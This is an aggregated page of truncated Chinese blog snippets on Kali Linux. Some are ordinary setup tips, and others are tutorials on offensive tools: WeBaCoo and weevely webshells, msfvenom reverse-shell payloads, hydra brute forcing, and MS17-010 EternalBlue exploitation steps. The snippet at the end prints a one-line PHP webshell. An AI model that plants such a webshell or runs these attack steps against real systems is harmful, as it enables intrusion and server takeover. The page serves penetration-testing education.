webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCoo(Web Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cookie头的名 cp:返回信息定界符 生成服务端 Webacoo -g -o a.php 客户端连接 Webacoo -t -u http://x.x.x.x/…

webacoo -g 生成一句话 -o 输出文件 -r 不混淆代码 -t 连接模式 -u 制定URL 生成一句话 webacoo -g -o a.php 连接一句话 webacoo -t -u http://url/a.php…

weevely是一个kali中集成的webshell工具,是webshell的生成和连接集于一身的轻量级工具,生成的后门隐蔽性比较好,是随机生成的参数并且加密的,唯一的遗憾是只支持php,weevely是交互性工具,只可以在命令终端执行. weevely generate password/tmp/1.php #生成一个名为1.php的后门,密码为password 这是生成后的php后门,是base64加密过后的. 将此后门上传到网站,用weevely连接,连接后面直接跟上设置的密码 weeve…

第1章 在windows系统中通过sqlmap注入 1.1 环境搭建 Sqlmap是目前功能最强大,使用最为广泛的注入类工具,是一个开源软件,被集成于kaliLinux, 由于sqlmap是基于Python编写,所以需要在系统中先安装好2.7.x版本的Python,然后将下载好的sqlmap放在Python2.7目录下,这里Python安装我就不一一截图了,因为都是使用默认安装,只是安装的时候根据需要可以修改下安装路径. 在Windows下首先把下载好的sqlmap放在Python路径下 然后我…

工具介绍 Shodan 是一个搜索引擎,但它与 Google 这种搜索网址的搜索引擎不同,Shodan 是用来搜索网络空间中在线设备的,你可以通过 Shodan 搜索指定的设备,或者搜索特定类型的设备,其中 Shodan 上最受欢迎的搜索内容是:webcam,linksys,cisco,netgear,SCADA.... Kali中安装 Shodan 安装命令: git clone https://github.com/achillean/shodan-python.git && cd s…

1 kali 基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是bt5r3(bractrack) 其中Metasploit是一个综合利用工具,极大提高攻击者渗透效率,使用ruby开发的,使用非常方便,进入该工具的方式:msfconsole,msf依赖与postgresql数据库,在使用msf之前要开启该数据库 step1:生成木马,msfvenom msfvenom -p windows/meterpreter/reverse_tcp lhost=kail的ip lport=55…

本文转自:https://www.cnblogs.com/yankaohaitaiwei/p/11556921.html 一.kali及Metasploit kali基于debin的数字取证系统,上面集成很多渗透测试工具,其前身是BT5 R3(BrackTrack),在信息搜集方面发挥很大作用. Metasploit是一个综合利用工具,极大提高了攻击者的渗透效率:使用Ruby开发:使用非常方便,进入该工具的方式:在终端输入msfconsole:MSF依赖于Postgresql数据库,在使用MSF…

前言 我们都知道,在学习网络安全的过程中,搭建漏洞靶场有着至关重要的作用.复现各种漏洞,能更好的理解漏洞产生的原因,提高自己的学习能力.下面我在kali中演示如何详细安装漏洞靶场Vulhub. 什么是Vulhub? Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身.Vulhub的官方地址为www.vulhub.org. 安装docker 因为Vulhub…

前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解.密码能否破解,在于字典是否强大.本文仅从安全角度去讲解工具的使用,请勿用于非法用途. hydra参数讲解 hydra是区分大小写的 -R #继续从上一次进度接着破解. -S #采用SSL链接. -s #PORT 可通过这个参数指定非默认端口. -l #LOGIN 指定破解的用户,对特定用户破解. -L #FILE 指定用户名字典. -p #PASS 小写,指定密码破…

一.概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack). 其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库. 二.步骤: Step1:生成木马,msfvenom msfvenom -p windows/meterpreter/reverse_tcp lhost=K…

在kali中安装两个版本的python 在kali中已经预装了两个版本的python,但是没有装pip(>︿<). 这时使用python或者python3表示python3:使用python2表示python2. 首先安装pip2 wget https://bootstrap.pypa.io/pip/2.7/get-pip.py python2 get-pip.py 这样就安装好了pip2 安装pip3 curl -s https://bootstrap.pypa.io/get-pip.py…

webacoo(web backdoor cookie) 类终端的shell 编码通信内容通过cookie头传输,隐蔽性较强 cm:base64编码的命令 cn:服务器用于返回数据的cookie头的名 cp:返回信息定界符 选项:   -f 系统函数使用功能1:system(默认)2:shell_exec3:exec4:passthru5:popen -g生成后门代码(需要-o)   -o 生成的输出文件名   -r 不混淆后门代码   -t 建立后门连接(需要-u)   -u 后门URL地址 …

askDing Life is short,use python 博客园 | 首页 | 新随笔 | 新文章 | 联系 | 订阅 | 管理 随笔: 326 文章: 5 评论: 4 引用: 0 kali菜单中各工具功能 kali菜单中各工具功能 一.说明 各工具kali官方简介(竖排):https://tools.kali.org/tools-listing 安装kali虚拟机可参考:https://www.cnblogs.com/lsdb/p/6500757.html pentestbox:虚拟机…

metasploit,默认使用的是postgresql数据库.在BT5或是Kali等专业的渗透系统中,postgresql已经被默认安装. 执行msfdb init会自动创建一个默认的用户名密码都是msf的postgresql数据库用户,可以用这个来连接.这段说的是在postgresql中建立新库和创建新用户,让msfconsole连接.为的是msfconsole和armitage使用的数据库分开,当然你也可以共用一个数据库. 看armitage连接的请直接跳到下一段. 启动postgresql…

Weevely ------------------------------------------------ 主要特点: ·         隐蔽的类终端的PHP webshell ·         30多个管理模块 o    执行系统命令.浏览文件系统 o    检查目标服务器的常见配置错误 o    基于现有连接,创建正向.反向的TCP shell连接 o    通过目标机器代理HTTP流量 o    从目标计算机运行端口扫描,渗透内网 ·         支持连接密码 weevely…

一.webshell简介 webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的. 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限.webshell常常被称为入侵者通过网…

前言 不知道怎么kali的eth0网卡突然消失了.这可有点难受啊.在网上查找了一番找到了解决办法,特此记录. 问题   怎么办? 解决办法 首先使用ifconfig -a命令查看所有的网卡接口  发现存在eth0网卡,但是没有ip地址.所以我们需要在网络接口配置文件中进行设置. 查看/etc/network/interfaces文件,发现只有lo网卡的配置  所以发现了问题的所在,那么添加对应的eth0网卡的配置即可,既可以配置dhcp也可以使用静态ip地址.  之后重启一下networking…

写在前面的话 能看懂此博客的朋友,深信你有一定的Kali基础了. 使用APT软件包处理工具(apt-get).Debian软件包管理器(dpkg)来维护.升级和安装自定义及第三方应用程序 APT软件包处理工具(apt-get) APT软件包处理工具是一个轻量级但功能强大的命令行工具,用于安装和删除软件包,通常简写为apt-get.apt-get会对所有安装过的软件做好记录,并且处理好依赖关系. 例如,用于渗透的最佳工具Metasploit就依赖一门叫做Ruby的编程语言.如果Ruby没有预先安装…

1.控制台输入命令: apt-get install ibus-pinyin 出现选择都选yes 2.安装完毕后输入命令,重启虚拟机: reboot 3.打开  输入法,如图中2处input method: 一直点OK,然后在选择的时候选ibus 4.打开 设置:如图settings 选择 区域和语言(region & language): 点击图中 ➕ 选择 Chinese(Pinyin),然后点击 Add: 5.退出后,我们就可以在kali界面右上角处看到安装的中文输入法,键盘按 Windo…

kali中直接用pip install pyopenssl安装当最新的openssl中的crypto中的类PKCS12Type改成了PKCS12 所以需要在phantom中改对应代码 将这个文件中对应的PKCS12Type的改成PKCS12就OK了…

情境今天在使用arpspoof这个命令的时候,提示没有命令找不到,此时就想着安装一下没想到,碰上kali源不支持的问题  解决所以,此时需要做的就是安装阿里云或者其他镜像  步骤1. vim /etc/apt/sources.list2. 把之前kali默认的源注释掉 (也就是在开头的第一个字母前端加:# )3. 镜像地址如下所示 #中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src h…

1,采用ultraISO 制作Kali的安装盘,无法安装.U盘不能被识别. 2,改用win32diskimager,能识别了,但期间出现CDROM找不到. 3,采用网上方式,ALT+ F2,ls /dev/sd*,拔插U盘,找到具体的device. 4,退出后还是无法找到U盘.已确认mount没有问题. 5,网上有写采用两个U盘进行安装的,于是再制作一个U盘,同时插上 ... 安装成功! 原因:不清楚/dev/sdb1是不是不够稳定?拔插U盘时我发现驱动号有改变,采用两个U盘,无论如何变换都能找…

中文版Kali装好之后,家目录会中文显示,不便操作 root@kali:~# ls -l drwxr-xr-x root root .0K 7月 : 公共 drwxr-xr-x root root .0K 7月 : 模板 drwxr-xr-x root root .0K 7月 : 视频 drwxr-xr-x root root .0K 7月 : 图片 drwxr-xr-x root root .0K 7月 : 文档 drwxr-xr-x root root .0K 7月 : 下载 drwxr-x…

VMware Workstation 中 虚拟机选项,安装VMware Tools 选项. 在虚拟机中,打开VMware Tools,将 VMwareTools-10.1.15-6627299.tar.gz 复制到主目录里. 然后在终端里输入以下命令,可看到 tar 包: ls 解压 tar ,输入以下命令: -.tar.gz 进入 vmware-tools-distrib 文件夹 cd vmware-tools-distrib/ 执行安装文件 sudo ./vmware-install.pl…

在Kali-linux中修改网卡文件,启动ssh和apache服务的方法 1.su root           //取得root权限 2.shift+字母      //大小写字母切换 3.修改网卡配置 采用DHCP方式上网 在桌面右键->在终端中打开 -> 输入命令“vim /etc/network/interfaces” -> 键盘输入i  进入插入编辑模式 -> 按如图配置好后,按Esc键+“:wq” 保存退出 -> 在终端输入命令“reboot”重启计算机即可自动获…

1.开启postgresql数据库 2.msfconsole 进入MSF中 3.search 17-010 搜索cve17-010相关的exp auxiliary/scanner/smb/smb_ms17_010    扫描漏洞是否存在 exploit/windows/smb/ms17_010_eternalblue  用来攻击的exp 4.探测漏洞是否存在 use auxiliary/scanner/smb/smb_ms17_010 5.set rhosts 192.168.121.146  …

1.在虚拟机设置共享目录 2.查看共享目录命令 root@kali:~# vmware-hgfsclient 3.新建文件夹 root@kali:~# mkdir /mnt/hgfs/ShareDir/ 4.创建文件夹 root@kali:~# /usr/bin/vmhgfs-fuse .host:/ /mnt/hgfs/ShareDir/ -o subtype=vmhgfs-fuse,allow_other root@kali:~# vmware-hgfsclient ShareDir…

John是一个破解系统密码的工具. 参数 John the Ripper 1.9.0-jumbo-1 OMP [linux-gnu 64-bit x86_64 AVX AC] Copyright (c) 1996-2019 by Solar Designer and others Homepage: http://www.openwall.com/john/ Usage: john [OPTIONS] [PASSWORD-FILES] --single[=SECTION[,..]] "singl…

一.什么是vulhub? Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身.Vulhub的官方地址为www.vulhub.org. 二.安装docker 1.因为Vulhub是一个基于docker和docker-compose的漏洞环境集合,所以,第一步我们需要安装docker,切换成root用户,象征性的更新一下软件,输入如下命令 apt-get up…

webshell 本质:<?php echo shell_exec($_GET['cmd']);?> windows平台 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强 [但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/] 1.利用上传漏洞,先上传一句话木马[支持三种服务器端PHP.ASP.ASP.NET] 使用ssh连接metasploitable 创建包含木马代码的文件 2.连接相应的服务器端 添加服务器端URL [密码为一…